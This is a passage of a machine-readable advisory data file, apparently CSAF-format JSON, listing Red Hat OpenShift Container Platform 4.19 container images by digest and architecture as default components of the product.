"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:1d66a8807c27cd43c86399e67ec86906edb97be4ca38b4a752bef1c880848083_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:1d66a8807c27cd43c86399e67ec86906edb97be4ca38b4a752bef1c880848083_s390x"
},
"product_reference": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:1d66a8807c27cd43c86399e67ec86906edb97be4ca38b4a752bef1c880848083_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:980e2f5e0f0676e559e91d50e2927fb9bf2f598db0d1ba043440e04d76cf46b9_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:980e2f5e0f0676e559e91d50e2927fb9bf2f598db0d1ba043440e04d76cf46b9_amd64"
},
"product_reference": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:980e2f5e0f0676e559e91d50e2927fb9bf2f598db0d1ba043440e04d76cf46b9_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:dcd241b04a6e196ad8b66a9d3cce0df26f126e99a85ce7a5443e61dc76194e5b_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:dcd241b04a6e196ad8b66a9d3cce0df26f126e99a85ce7a5443e61dc76194e5b_arm64"
},
"product_reference": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:dcd241b04a6e196ad8b66a9d3cce0df26f126e99a85ce7a5443e61dc76194e5b_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:093a5ff464b31d0f1058c452843dd119dfd1798d91855dbe9fdbd5a45c912efb_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:093a5ff464b31d0f1058c452843dd119dfd1798d91855dbe9fdbd5a45c912efb_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:093a5ff464b31d0f1058c452843dd119dfd1798d91855dbe9fdbd5a45c912efb_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2320a5d225dccf8f02379818bee2e93ae87a8444698f20141f6a0425b1661601_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2320a5d225dccf8f02379818bee2e93ae87a8444698f20141f6a0425b1661601_amd64"
},
"product_reference": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2320a5d225dccf8f02379818bee2e93ae87a8444698f20141f6a0425b1661601_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:46adf0538ec9fbd67abc4565c013f2503c2a11191de264310a2c770bfb566753_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:46adf0538ec9fbd67abc4565c013f2503c2a11191de264310a2c770bfb566753_arm64"
},
"product_reference": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:46adf0538ec9fbd67abc4565c013f2503c2a11191de264310a2c770bfb566753_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:d48ca3a08fbb356d69be5b61274d75b701d48803a9d57c8d377ce2d0df83169a_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:d48ca3a08fbb356d69be5b61274d75b701d48803a9d57c8d377ce2d0df83169a_s390x"
},
"product_reference": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:d48ca3a08fbb356d69be5b61274d75b701d48803a9d57c8d377ce2d0df83169a_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:0b1b706bc5a0188d40950a1fdd30f8c410e68dd568ed7d07c1f09443fbde28f4_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:0b1b706bc5a0188d40950a1fdd30f8c410e68dd568ed7d07c1f09443fbde28f4_arm64"
},
"product_reference": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:0b1b706bc5a0188d40950a1fdd30f8c410e68dd568ed7d07c1f09443fbde28f4_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:173800cfc487973c018e8d9badb7d60d26509bbe0803e9a56fba1d5a65070dc0_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:173800cfc487973c018e8d9badb7d60d26509bbe0803e9a56fba1d5a65070dc0_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:173800cfc487973c018e8d9badb7d60d26509bbe0803e9a56fba1d5a65070dc0_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:78a2368225915aca2a514c5d82ba82fff8e70e6123c08905c46839a821f4c8ab_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:78a2368225915aca2a514c5d82ba82fff8e70e6123c08905c46839a821f4c8ab_amd64"
},
"product_reference": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:78a2368225915aca2a514c5d82ba82fff8e70e6123c08905c46839a821f4c8ab_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:e44aa77638b86f0ade3d4b69e150e8e9e95573ec90b6031224b87e404b5d6a79_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:e44aa77638b86f0ade3d4b69e150e8e9e95573ec90b6031224b87e404b5d6a79_s390x"
},
"product_reference": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:e44aa77638b86f0ade3d4b69e150e8e9e95573ec90b6031224b87e404b5d6a79_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:313b7b7e1f619f5fd121ca2402d9db6876d021be227b496288809f63f1209561_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:313b7b7e1f619f5fd121ca2402d9db6876d021be227b496288809f63f1209561_s390x"
},
"product_reference": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:313b7b7e1f619f5fd121ca2402d9db6876d021be227b496288809f63f1209561_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:5b232dcf5a47400d1b1d105895df8143b50dc74613b1463b275d6d304e0e0085_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:5b232dcf5a47400d1b1d105895df8143b50dc74613b1463b275d6d304e0e0085_amd64"
},
"product_reference": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:5b232dcf5a47400d1b1d105895df8143b50dc74613b1463b275d6d304e0e0085_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:774dcaecbaa4f7b743b49c34a6a9889a27c6379110672a2f28fb4f83cb0f0fe6_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:774dcaecbaa4f7b743b49c34a6a9889a27c6379110672a2f28fb4f83cb0f0fe6_arm64"
},
"product_reference": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:774dcaecbaa4f7b743b49c34a6a9889a27c6379110672a2f28fb4f83cb0f0fe6_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:8d55cc650683e44676413797328fff9b3563eb78a1aae4cabe736b20e9f15ff4_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:8d55cc650683e44676413797328fff9b3563eb78a1aae4cabe736b20e9f15ff4_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:8d55cc650683e44676413797328fff9b3563eb78a1aae4cabe736b20e9f15ff4_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:13cd27f7e445af565cef18a24ceca435b4ce2a0c99876b9ad087fdf50e343be6_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:13cd27f7e445af565cef18a24ceca435b4ce2a0c99876b9ad087fdf50e343be6_arm64"
},
"product_reference": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:13cd27f7e445af565cef18a24ceca435b4ce2a0c99876b9ad087fdf50e343be6_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:5eee15ae4f809e708dbba035fdf60bd2c331462bc6256df74f9124fac03be62b_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:5eee15ae4f809e708dbba035fdf60bd2c331462bc6256df74f9124fac03be62b_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:5eee15ae4f809e708dbba035fdf60bd2c331462bc6256df74f9124fac03be62b_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:af94257f6dd0307527211d5ab2b77ff971d5432a003d4f8e2f1e884cf6ee5215_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:af94257f6dd0307527211d5ab2b77ff971d5432a003d4f8e2f1e884cf6ee5215_s390x"
},
"product_reference": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:af94257f6dd0307527211d5ab2b77ff971d5432a003d4f8e2f1e884cf6ee5215_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:cba1849a3d647457c561e01daf7eda74d775430a8b95458684620c0ebb3f47d2_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:cba1849a3d647457c561e01daf7eda74d775430a8b95458684620c0ebb3f47d2_amd64"
},
"product_reference": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:cba1849a3d647457c561e01daf7eda74d775430a8b95458684620c0ebb3f47d2_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/frr-rhel9@sha256:1b9bd17c112e00f11fca3cfaea5908d0cd370598beb6909a3c00f58ca6774bee_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:1b9bd17c112e00f11fca3cfaea5908d0cd370598beb6909a3c00f58ca6774bee_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/frr-rhel9@sha256:1b9bd17c112e00f11fca3cfaea5908d0cd370598beb6909a3c00f58ca6774bee_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/frr-rhel9@sha256:2c646a3a35e8a4503f378096f6045fdb816fa9d5728cc14759748b7265aa47dc_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:2c646a3a35e8a4503f378096f6045fdb816fa9d5728cc14759748b7265aa47dc_amd64"
},
"product_reference": "registry.redhat.io/openshift4/frr-rhel9@sha256:2c646a3a35e8a4503f378096f6045fdb816fa9d5728cc14759748b7265aa47dc_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/frr-rhel9@sha256:47fd82ed75709dd28b0f9f2eab2a051e3bedac64d2fa11dc93a8a8a7159e287b_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:47fd82ed75709dd28b0f9f2eab2a051e3bedac64d2fa11dc93a8a8a7159e287b_s390x"
},
"product_reference": "registry.redhat.io/openshift4/frr-rhel9@sha256:47fd82ed75709dd28b0f9f2eab2a051e3bedac64d2fa11dc93a8a8a7159e287b_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/frr-rhel9@sha256:e95f8dd80a31504ccf2ff1ea37026370e41edd179151f1c7c2901e5ed12c1296_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:e95f8dd80a31504ccf2ff1ea37026370e41edd179151f1c7c2901e5ed12c1296_arm64"
},
"product_reference": "registry.redhat.io/openshift4/frr-rhel9@sha256:e95f8dd80a31504ccf2ff1ea37026370e41edd179151f1c7c2901e5ed12c1296_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:65c161d7215a460b2295a2b4eb82e8bd7e2079e145596185f83d84c4676f1eed_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:65c161d7215a460b2295a2b4eb82e8bd7e2079e145596185f83d84c4676f1eed_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:65c161d7215a460b2295a2b4eb82e8bd7e2079e145596185f83d84c4676f1eed_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:8f7e2a8735cb9b09639c5a467b8656bd7dd1bd4f72bc50164f0e4623ffacd93c_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:8f7e2a8735cb9b09639c5a467b8656bd7dd1bd4f72bc50164f0e4623ffacd93c_s390x"
},
"product_reference": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:8f7e2a8735cb9b09639c5a467b8656bd7dd1bd4f72bc50164f0e4623ffacd93c_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:a045bd36d61b9586134423526ec66f4aa18c140958a01da59ffaa4003c229e4e_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:a045bd36d61b9586134423526ec66f4aa18c140958a01da59ffaa4003c229e4e_arm64"
},
"product_reference": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:a045bd36d61b9586134423526ec66f4aa18c140958a01da59ffaa4003c229e4e_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:d426bb25b78392f8093739e457ab75adf9366406e09ef18f8c75d8998a24731e_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:d426bb25b78392f8093739e457ab75adf9366406e09ef18f8c75d8998a24731e_amd64"
},
"product_reference": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:d426bb25b78392f8093739e457ab75adf9366406e09ef18f8c75d8998a24731e_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:17333d63845becea642ecb6fd8f76e7a4d698f8a661a981b59e9c920d1973d46_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:17333d63845becea642ecb6fd8f76e7a4d698f8a661a981b59e9c920d1973d46_s390x"
},
"product_reference": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:17333d63845becea642ecb6fd8f76e7a4d698f8a661a981b59e9c920d1973d46_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:5c73127d0656e37837d8dba2e4770da5bc26885daf37a4d708a04399410d85a2_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:5c73127d0656e37837d8dba2e4770da5bc26885daf37a4d708a04399410d85a2_amd64"
},
"product_reference": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:5c73127d0656e37837d8dba2e4770da5bc26885daf37a4d708a04399410d85a2_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:ee3b7a97fb8e0f135e89f28c4f3ad31463a17003c92b979b4f16c262d8d69737_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:ee3b7a97fb8e0f135e89f28c4f3ad31463a17003c92b979b4f16c262d8d69737_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:ee3b7a97fb8e0f135e89f28c4f3ad31463a17003c92b979b4f16c262d8d69737_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:f59805de5ca2dde13a899b2058e1178288c80e4589515b08b89a6341f64fceb2_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:f59805de5ca2dde13a899b2058e1178288c80e4589515b08b89a6341f64fceb2_arm64"
},
"product_reference": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:f59805de5ca2dde13a899b2058e1178288c80e4589515b08b89a6341f64fceb2_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:4892cd8581f10f3338980a4bc69f02d8379e54fc0f4c4d11af27baec253ea11a_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:4892cd8581f10f3338980a4bc69f02d8379e54fc0f4c4d11af27baec253ea11a_s390x"
},
"product_reference": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:4892cd8581f10f3338980a4bc69f02d8379e54fc0f4c4d11af27baec253ea11a_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:92295081a775d918e0963d2aff01bb21fc1200ca06faf7a882c652ebeee8c8f0_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:92295081a775d918e0963d2aff01bb21fc1200ca06faf7a882c652ebeee8c8f0_arm64"
},
"product_reference": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:92295081a775d918e0963d2aff01bb21fc1200ca06faf7a882c652ebeee8c8f0_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:a832bdd818c5c9aa386c7b8fc068c7e41454bd3ae5851e4a805e17c0a22485d5_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:a832bdd818c5c9aa386c7b8fc068c7e41454bd3ae5851e4a805e17c0a22485d5_amd64"
},
"product_reference": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:a832bdd818c5c9aa386c7b8fc068c7e41454bd3ae5851e4a805e17c0a22485d5_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:f3f2d167037e26af9b863e6561d2d64bcccdabfc3a6efa7f1085389ece519661_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:f3f2d167037e26af9b863e6561d2d64bcccdabfc3a6efa7f1085389ece519661_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:f3f2d167037e26af9b863e6561d2d64bcccdabfc3a6efa7f1085389ece519661_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:01d975619247a08e37e5d9fb38dcbca09555b283991441a4a208da524e4f8c74_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:01d975619247a08e37e5d9fb38dcbca09555b283991441a4a208da524e4f8c74_s390x"
},
"product_reference": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:01d975619247a08e37e5d9fb38dcbca09555b283991441a4a208da524e4f8c74_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:04db41f215a8d65a168c117ad8cdbf0d0ca3dc4baaa5acede9e29beac647ce0e_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:04db41f215a8d65a168c117ad8cdbf0d0ca3dc4baaa5acede9e29beac647ce0e_amd64"
},
"product_reference": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:04db41f215a8d65a168c117ad8cdbf0d0ca3dc4baaa5acede9e29beac647ce0e_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:67d767e895fb0299033848441253b41588136a70e31763386c973672c26be496_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:67d767e895fb0299033848441253b41588136a70e31763386c973672c26be496_arm64"
},
"product_reference": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:67d767e895fb0299033848441253b41588136a70e31763386c973672c26be496_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:be919e58f27fa8f244683d2b42e4aa2ab467dc93fe7c3c3c3b6032f3555627f8_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:be919e58f27fa8f244683d2b42e4aa2ab467dc93fe7c3c3c3b6032f3555627f8_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:be919e58f27fa8f244683d2b42e4aa2ab467dc93fe7c3c3c3b6032f3555627f8_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:083bb81614554fab84226913ccd021b11f7ef126606dbd10cabd727a501551e4_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:083bb81614554fab84226913ccd021b11f7ef126606dbd10cabd727a501551e4_s390x"
},
"product_reference": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:083bb81614554fab84226913ccd021b11f7ef126606dbd10cabd727a501551e4_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:1aa42ec77b3d3339df819904aa14a43382739617e532b5d0002a5e4ebc74736b_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:1aa42ec77b3d3339df819904aa14a43382739617e532b5d0002a5e4ebc74736b_arm64"
},
"product_reference": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:1aa42ec77b3d3339df819904aa14a43382739617e532b5d0002a5e4ebc74736b_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:83ef5cae2611a335710b324338a1f26d7e90a7918b4fe642e05e447e65d46b7d_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:83ef5cae2611a335710b324338a1f26d7e90a7918b4fe642e05e447e65d46b7d_ppc64le"
},
